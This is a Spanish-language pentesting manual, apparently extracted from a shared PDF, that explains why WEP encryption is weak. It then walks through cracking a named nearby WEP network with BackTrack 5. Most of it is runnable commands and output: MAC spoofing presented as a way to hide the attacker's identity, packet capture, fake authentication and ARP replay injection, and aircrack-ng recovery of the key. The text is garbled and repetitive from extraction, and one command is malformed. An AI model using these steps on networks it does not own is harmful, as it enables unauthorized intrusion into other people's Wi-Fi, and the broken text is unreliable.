manual de pentesting sobre ataque a encirptado wep con backtrack 5

20
EL ARTE DEL HACKING EL ARTE DEL HACKING EL ARTE DEL HACKING EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: [email protected] Página 1

Upload: carlos-alberto-castruita-rodriguez

Post on 15-Sep-2015

23 views

Category:

Documents


6 download

DESCRIPTION

Manual de Pentesting Sobre Ataque a Encirptado Wep Con Backtrack 5Autor: Carlos Alberto Castruita RodriguezDirector de WhiteHat Mexico

TRANSCRIPT

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 1

  • Libro de Et

    Contacto: [email protected]

    Edicin

    Descubre como es el

    LSCA, Carlos Alberto Castruita Rodrguez

    Edicin impresa en PDF protegida contra impresin y sobre escritura.

    EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected]

    Edicin patrocinada por WhiteHat Mxico

    el Arte del Hacking de una visin de un White Hat.

    Por

    Carlos Alberto Castruita Rodrguez

    Edicin Independiente 2015

    impresa en PDF protegida contra impresin y sobre escritura.

    EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    al Hacking para entrenamiento sobre ataques informticos.

    Pgina 2

    Arte del Hacking de una visin de un White Hat.

    Carlos Alberto Castruita Rodrguez

    impresa en PDF protegida contra impresin y sobre escritura.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 3

    Descubre desde cero como es Arte del Hacking de una visin de un White Hat.

    El libro de PENTESTING y de SEGURIDAD INFORMATICA est diseado para hacer pruebas de

    vulnerabilidad de seguridad informtica, robo de informacin y espionaje de datos, narrado a un

    nivel tcnico para gentes con conocimiento de nivel bsico a medio del rea de informtica o

    soporte tcnico en sistemas.

    Autor: Carlos Alberto Castruita Rodrguez

    Director de WhiteHat - Mxico

    Con 20 aos de experiencia en el rea sistemas.

    Certificado Hellermann Tyton

    Certificado 3com Networks

    Ethical Hacker Certificado

    Contacto: [email protected]

  • Libro de Et

    Contacto: [email protected]

    EL ENCRIPTADO WEP

    Estoy casi convencido de

    haya lidiado mnimamente con su router. No en vano, el trmino

    siempre que debemos introducir la clave de nuestra Wi

    Internet. Pues bien, a qu nos r

    tratar de explicar aqu.

    Con el ttulo de este artculo he dado la pista clave y es que

    Equivalent Privacy, que en espaol sera Privacidad Equivalente a Cableado) es un sistema

    de cifrado de informacin que permite encriptar los datos que viajan a travs de sistemas

    inalmbricos, es decir, lo que pasa a travs de nuestra Wi

    se pretende dar una cobertura o proteccin a los datos que circulan por nuestra

    inalmbrica, los cuales estn en pleno aire y al alcance de todos, y as protegerlos como si

    viajaran a travs de un cable de red.

    Pero he aqu que la cosa al principio pareci ir bien per

    EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected]

    EL ENCRIPTADO WEP

    Diagrama de RC4

    que las siglas WEP no sonarn a extrao para cualquiera que

    haya lidiado mnimamente con su router. No en vano, el trmino

    siempre que debemos introducir la clave de nuestra Wi-Fi para poder conectarnos a

    Internet. Pues bien, a qu nos referimos exactamente con WEP? Pues eso es lo que

    Con el ttulo de este artculo he dado la pista clave y es que WEP (acrnimo para

    , que en espaol sera Privacidad Equivalente a Cableado) es un sistema

    cifrado de informacin que permite encriptar los datos que viajan a travs de sistemas

    inalmbricos, es decir, lo que pasa a travs de nuestra Wi-Fi. Mediante esta encriptacin

    se pretende dar una cobertura o proteccin a los datos que circulan por nuestra

    inalmbrica, los cuales estn en pleno aire y al alcance de todos, y as protegerlos como si

    viajaran a travs de un cable de red.

    Pero he aqu que la cosa al principio pareci ir bien pero se torci !! la razn? el

    EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    al Hacking para entrenamiento sobre ataques informticos.

    Pgina 4 1

    no sonarn a extrao para cualquiera que

    haya lidiado mnimamente con su router. No en vano, el trmino WEP aparece casi

    Fi para poder conectarnos a

    eferimos exactamente con WEP? Pues eso es lo que

    (acrnimo para Wired

    , que en espaol sera Privacidad Equivalente a Cableado) es un sistema

    cifrado de informacin que permite encriptar los datos que viajan a travs de sistemas

    Fi. Mediante esta encriptacin

    se pretende dar una cobertura o proteccin a los datos que circulan por nuestra red

    inalmbrica, los cuales estn en pleno aire y al alcance de todos, y as protegerlos como si

    la razn? el RC4.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 5

    2

    RC4 (River Cipher 4 o Rons Code 4 en honor a su creador Ron Rivest) es el algoritmo que

    utiliza WEP para encriptar la informacin, el cual resulta ser muy rpido pero en

    detrimento es simple, demasiado simple, tan simple que fue descartado como algoritmo

    para altos niveles de seguridad.

    Las redes encriptadas mediante WEP no son realmente seguras, pero a pesar de eso es la

    tipo de cifrado muy popular hoy en da.

    WEP fue uno de los primeros sistemas de cifrado para redes inalmbricas que salieron a la

    luz de forma comercial, de hecho casi todos los routers de los ISP nos dan una clave para

    encriptacin WEP por defecto.

    Pero dejemos de hablar de los problemas del WEP y hablemos un poco de sus entraas. La

    clave de la encriptacin WEP est en la famosa contrasea que nos otorga nuestro

    ISP cuando contratamos sus servicios. Esa contrasea es vista por cualquier dispositivo

    como una secuencia de bits (unos y ceros) que puede tener un tamao de 64 o 128,

    dependiendo del nivel de seguridad. Con la secuencia de bits de la contrasea se

    enmascara la informacin para que a ojos ajenos sea ilegible, pero que en cuanto aterriza

    en un dispositivo que tambin dispone de dicha contrasea se descodifique y se trate con

    normalidad.

    De todo esto lo que realmente hay que entender es que el cifrado WEP es realmente

    simple, tanto que hoy en da es relativamente sencillo el penetrar su seguridad.

  • Libro de Et

    Contacto: [email protected]

    Descarga el BackTrack 5 R3

    Deberemos generar un CD de BacTrack 5 R3.

    Lo que necesitas:

    Un CD de BackTrack 5 R3.

    Un adaptador o tarjeta de red con capacidad de inyeccin de paquetes.

    Una red WiFi cercana.

    Lo primero de todo es arrancar tu ordenador usando

    grfico.

    Debes abrir una ventana de la terminal o consola (Ctrl+Alt+T).

    Y escribir el siguiente comando:

    >> ESCRIBIR: Sudo s

    Estando ya como ROOT antes previamente escrito el password y estando ya con todos los

    recursos del sistema a disposicin.

    EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected]

    BackTrack 5 R3 en un CD.

    CD de BacTrack 5 R3.

    BackTrack 5 R3.

    Un adaptador o tarjeta de red con capacidad de inyeccin de paquetes.

    cercana.

    Lo primero de todo es arrancar tu ordenador usando BackTrack, preferiblemente en modo

    Debes abrir una ventana de la terminal o consola (Ctrl+Alt+T).

    el siguiente comando: Sudo s

    s { INTRO } ( para poder accesar como ROOT)

    Estando ya como ROOT antes previamente escrito el password y estando ya con todos los

    recursos del sistema a disposicin.

    EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    al Hacking para entrenamiento sobre ataques informticos.

    Pgina 6 1

    3

    Un adaptador o tarjeta de red con capacidad de inyeccin de paquetes.

    BackTrack, preferiblemente en modo

    ( para poder accesar como ROOT)

    Estando ya como ROOT antes previamente escrito el password y estando ya con todos los

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 7

    2

    4

    Pasando de usuario que en este caso es castruita pasamos a ROOT sea administrador, as

    teniendo todos los privilegios para poder trabajar.

    Escribiremos el otro comando. Ifconfig

    >> ESCRIBIR: Ifconfig { INTRO } ( con este comando podremos ver la configuracin

    y estatus de la tarjeta de red.)

    Escribiremos el otro comando.

    Airmon-ng

    >> ESCRIBIR: airmon-ng { INTRO } (el modo de monitoreo)

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 8

    5

    El comando anterior te dir cul es tu tarjeta inalmbrica, lo nombres ms comunes

    son wlan0, ra0, eth0 eth1, cosas as por el estilo. Te dars cuenta de cul es nombre de

    tu adaptador de red.

    El siguiente paso es cambiar la MAC de tu ordenador. Para ello debes introducir los

    siguientes comandos:

    Si tu tarjeta de red se llama wlan0, entonces los comandos seran:

    - airmon-ng

    - ifconfig

    - macchanger

    >> ESCRIBIR: airmon-ng stop wlan0 { INTRO } (Deshabilitamos el modo

    Monitoreo)

    Deshabilitamos la interface Wlan0 para poder despus deshabilitar el dispositivo de red,

    que es el dispositivo rt2800usb.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 9

    6

    Escribiremos el otro comando. ifconfig

    >> ESCRIBIR: ifconfig wlan0 down { INTRO }

    Con esta instruccin desconectamos la interface wlan0 del driver

    Prosiguiendo con siguiente comando macchanger

    >> ESCRIBIR: macchanger --mac 00:00:00:00:00:00 wlan0 { INTRO }

    Dondequiera que veas (tarjeta de red) debes reemplazarlo con el nombre de tu tarjeta de

    red. Nosotros hemos usado la MAC 00:11:22:33:44:55, pero t puedes usar cualquiera

    que se te ocurra.

    Es importante ver que al poner el comando macccharger se concluya correctamente el

    cambio de MAC ADRRESS. El mac de nuestra tarjeta de red usb que es fabricada por

    EDIMAX, fue cambiada la mac por una de CIMSYS.

    Porque el cambio de numero de serie de nuestra tarjeta de red o cambio de MAC. Para no

    dejar rastro de nuestra identidad al momento del ataque al modem wifi. Nos aparece en

    la imagen la sentencia NEW MAC: con nuestra mac falsa obteniendo una identidad

    falsa del hardware que va a atacar.

    Ahora que ya tenemos nuestra nueva mac adrress daremos de alta los servicios, para

    empezar hacer el monitoreo.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 10

    Escribiremos el siguiente comando. ifconfig

    >> ESCRIBIR: ifconfig wlan0 up { INTRO } (damos de alta el servicio de nuestra

    tarjeta de red)

    >> ESCRIBIR: iwconfig mon0 { INTRO } ( nos muestra la configuracin del monitor

    o Mon0)

    Ya que tenemos el servicio de la interface funcionando que es Wlan0 .

    Nuestro siguiente comando es Airmon-ng, el cual ya una de las herramientas que

    proporciona la suite de backtrack. Te recomiendo que tengas un cuaderno de apuntes y

    copies los comandos para que puedas ir memorizando las lneas para cuando hagas

    ataques en campo no te falle por falta de un comando o de error de escritura.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 11

    7 8

    Bueno ya estamos con las herramientas de backtrack con la cual empezaremos con

    airmon-ng.

    >> ESCRIBIR: airmon-ng start wlan0 { INTRO } (script diseado para convertir tarjetas inalmbricas en el monitor)

    Este script puede ser usado para activar el modo de monitor inalmbrico interfaces.

    Tambin se puede utilizar para volver desde el modo de monitor para gestionados de

    modo. Entrando en el comando airmon-ng sin parmetros mostrar el estado de

    interfaces.

    El siguiente comando te permitir ver cules son las redes WiFi que hay a tu alrededor.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 12

    9

    Ya que ejecutamos el comando Airmon-ng , procederemos con el segundo comando que

    es Airodump-ng.

    Te muestro su sintaxis a continuacin.

    airodump-ng [,,...]

    Opciones:

    --ivs : Graba nicamente los IVs capturados

    --gpsd : Usa GPSd

    --w : Nombre del archivo donde guardar las capturas

    -write : Lo mismo que --w

    --beacons : Guardar todas las balizas o beacons en el archivo

    --netmask : Filtrar APs por mscara

    --bssid : Filtrar APs por BSSID

    Por defecto, airodump-ng va saltando alrededor de los canales 2.4Ghz.

    Puedes capturar en un canal especfico usando:

    --channel : Capturar en un canal especfico

    --band : Banda en la que actuar airodump-ng

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 13

    10

    --cswitch : Saltar de canal con este mtodo:

    0 : FIFO (opcin por defecto)

    1 : Round Robin

    2 : Saltar al ltimo

    -s : Lo mismo que --cswitch

    >> ESCRIBIR: airodump-ng mon0 { INTRO }

    Airodump-ng se usa para capturar paquetes wireless 802.11 y es til para ir acumulando

    vectores de inicializacin IVS con el fin de intentar usarlos con aircrack-ng y obtener la

    clave WEP.

    Va a salir una lista con todas las redes inalmbricas alrededor, donde dice el BSSID (MAC

    del router que da la seal), PWR (Poder de seal), CHN (Canal en que se encuentra la red),

    ENC (Es el tipo de encriptacin) y ESSID (Nombre de la red inalmbrica). Te mostrare abajo

    la tabla de los campos que usa Airodump-ng.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 14

    9

    11

    11

    Campo Descripcin

    BSSID Direccin MAC del punto de acceso.

    PWR Nivel de seal. Su significado depende del driver que usemos, pero cuanto

    mayor sea el PWR ms cerca estaremos del AP o del cliente. Si el PWR es -1,

    significa que el driver no soporta la deteccin del nivel de seal. Si el PWR es -1

    para algunos clientes (stations) es porque los paquetes proceden del AP hacia

    el cliente pero las transmisiones del cliente se encuentran fuera del rango de

    cobertura de tu tarjeta. Lo que significa que solo escuchas la mitad de la

    comunicacin. Si todos los clientes tienen PWR -1 significa que el driver no

    tiene la cpacidad de detectar el nivel de seal.

    RXQ Calidad de recepcin calculada a travs del porcentaje de paquetes

    (management y paquetes de datos) recividos correctamente en los ltimos 10

    segundos. Mira la nota para una explicacin ms detallada.

    Beacons Nmero de paquetes anucio o beacons enviadas por el AP. Cada punto de

    acceso envia alrededor de diez beacons por segundo cuando el rate o

    velocidad es de 1M, (la ms baja) de tal forma que se pueden recibir desde

    muy lejos.

    # Data Nmero de paquetes de datos capturados (si tiene clave WEP, equivale

    tambien al nmero de IVs), incluyendo paquetes de datos broadcast (dirigidos

    a todos los clientes).

    #/s Nmero de paquetes de datos capturados por segundo calculando la media de

    los ltimos 10 segundos.

    CH Nmero de canal (obtenido de los paquetes anuncio o beacons).

    Nota: Algunas veces se capturan paquetes de otros canales, incluso si

    airodump-ng no est saltando de canal en canal, debido a interferencias o

    solapamientos en la seal.

    MB Velocidad mxima soportada por el AP. Si MB = 11, es 802.11b, si MB = 22es

    802.11b+ y velocidades mayores son 802.11g. El punto (despues del 54) indica

    que esa red soporta un prembulo corto o short preamble.

    ENC Algoritmo de encriptacin que se usa. OPN = no existe encriptacin

    (abierta),WEP? = WEP u otra (no se han capturado suficientes paquetes de

    datos para saber si es WEP o WPA/WPA2), WEP (sin el interrogante) indica

    WEP esttica o dinmica, y WPA o WPA2 en el caso de que se use TKIP o

    CCMP.

    CIPHER Detector cipher. Puede ser CCMP, WRAP, TKIP, WEP, WEP40, o WEP104.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 15

    AUTH El protocolo de autenticacin usado. Puede ser MGT, PSK (clave

    precompartida), o OPN (abierta).

    ESSID Tambien llamado SSID, que puede estar en blanco si la ocultacin del SSID

    est activada en el AP. En este caso, airodump-ng intentar averiguar el SSID

    analizando paquetes probe responses y association requests (son paquetes

    enviados desde un cliente al AP).

    STATION Direccin MAC de cada cliente asociado.

    Lost El nmero de paquetes perdidos en los ltimos 10 segundos.

    Packets El nmero de paquetes de datos enviados por el cliente.

    Probes Los ESSIDs a los cuales ha intentado conectarse el cliente.

    Cuando veas la red que deseas hackear, pulsa Ctrl + C para detener el escaneo quedando

    la lista final. Resalta la fila perteneciente a la red de inters, y tomar nota de dos cosas: su

    BSSID y su canal (en la columna CH), como se ilustra a continuacin. Es evidente que la red

    que desea crackear debe tener cifrado WEP (en la columna ENC), no debe tener WPA, ni

    ninguna otra cosa.

    Ahora vamos a ver lo que est pasando con la red que hayas elegido y capturar esa

    informacin en un archivo.

    Subraye la ESSID con la que vamos trabajar en este libro que es INFINITUM2ABB72.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 16

    14 13

    Vemos que ya tenemos un wifi wep, cuyos datos son los siguientes:

    ESSID: INFINITUM2ABB72

    ENC: WEP

    CHANEL: 1

    BSSID: 00:24:17:81:B4:0D

    PWR: -78

    Nos indica PWR, que nuestro wifi que deseamos atacar esta un poco retirado, y que nos

    puede tardar un poco mas de tiempo en obtener la cantidad de paquetes que

    necesitamos acumular para obtener la contrasea.

    >> ESCRIBIR: airodump-ng -c (canal) -w (nombre del archivo) --bssid

    (bssid) mon0 { INTRO }

    Entendemos ya con nuestros datos que la red que deseas hackear es INFINITUM2ABB72,

    que su canal es 1, que deseamos ponerle al archivo de escritura de los datos como

    hackingwifi y que el bssid es 00:24:17:81:B4:0D, entonces el comando sera:

    airodump-ng -c 1 -w hackingwifi --bssid 00:24:17:81:B4:0D mon0

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 17

    Ahora ya estas capturando datos!!!!, ahora fjate que hay una columna que dice DATA,

    estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como

    mnimo debes capturar unos 20,000 paquetes. Yo recomiendo 30,000.

    Notars que puede ir muy lento, esto significa que ninguna persona est utilizando la red

    en el momento. Entonces no est generando trfico y te podra llevar demasiado tiempo

    llegar a los 20,000 paquetes. Por suerte t mismo puedes inyectarle trfico a la red y para

    eso es el comando siguiente.

    Abre una nueva ventana de la consola y escribe el siguiente comando: Aireplay-ng.

    SINTAXIS: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid)

    mon0

    -a es el bssid de la red que estamos atacando.

    -h es la mac falsa que le diste a tu tarjeta de red al principio.

    -e es el nombre de la red que estamos atacando.

    >> ESCRIBIR: aireplay-ng -1 0 -a 00:24:17:81:B4:0D -h 00:11:22:33:44:55

    - e INFINITUM2ABB72 mon0 { INTRO }

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 18

    15

    Despus de introducir el comando deberan aparecer 4 lneas de cdigos y la final debe

    decir que la conexin ha sido exitosa (Association successful), esto significa que

    estas conectado en capa 2 del router de la red que ests atacando.

    Si por alguna razn no te puedes conectar, entonces las causas pueden ser las siguientes:

    La red que quieres atacar est muy lejos.

    Tu tarjeta de red no puede hacer inyeccin de paquetes.

    El router que quieres atacar tiene seguridad para evitar este tipo de ataques.

    Ahora para inyectarle el trfico introduce el siguiente comando: Aireplay-ng

    >> ESCRIBIR: aireplay-ng -3 -b 00:24:17:81:B4:0D -h 00:11:22:33:44:55

    mon0 { INTRO }

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 19

    Dnde:

    -b es el bssid de la red que estamos atacando.

    -h es la MAC falsa que le dimos a tu tarjeta de red inalmbrica.

    Vers que se empezaran a inyectar paquetes, si vas a ver a la otra terminal donde ests

    capturando los paquetes te dars cuenta que la columna de DATA ahora avanzar mucho

    ms rpido.

    Dependiendo de la potencia de la red que ests atacando este proceso podra tomar algn

    tiempo. Es cuestin de que dejes el ordenador trabajar y vayas a dar una vuelta hasta que

    data llegue a 30,000 paquetes.

    Al llegar a los 30,000 paquetes o IVs pulsaremos CTRL+ C, para frenar la operacin.

    A continuacin escribiremos el comando: Dir

    >> ESCRIBIR: dir { INTRO }

    Nos muestra el directorio una serie de archivos generados con el nombre de archivo

    hackingwifi + 01, con extensiones .cap, .csv, kismet.csv, kismet.netxml.

    Seleccionamos el archivo hackingwifi-01.cap para poder obtener la contrasea del wifi

    atacado.

  • EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING

    Libro de Ethical Hacking para entrenamiento sobre ataques informticos.

    Contacto: [email protected] Pgina 20

    16 17

    Ejecuta el siguiente comando para recuperar que los datos que hemos recogido:

    SINTAXIS: aircrack-ng -b (bssid) (nombre de archivo-01.cap) O

    aircrack-ng (nombre de archivo-01.cap)

    >>ESCRIBIR: aircrack-ng -b hackingwifi-01.cap { INTRO }

    Si no has recopilado suficientes datos, aircrack presentar un error y te dir que vuelvas a

    intentarlo con ms datos. Si tienes xito, se ver as,

    KEY FOUND [ 87:F2:71:32:E6 ]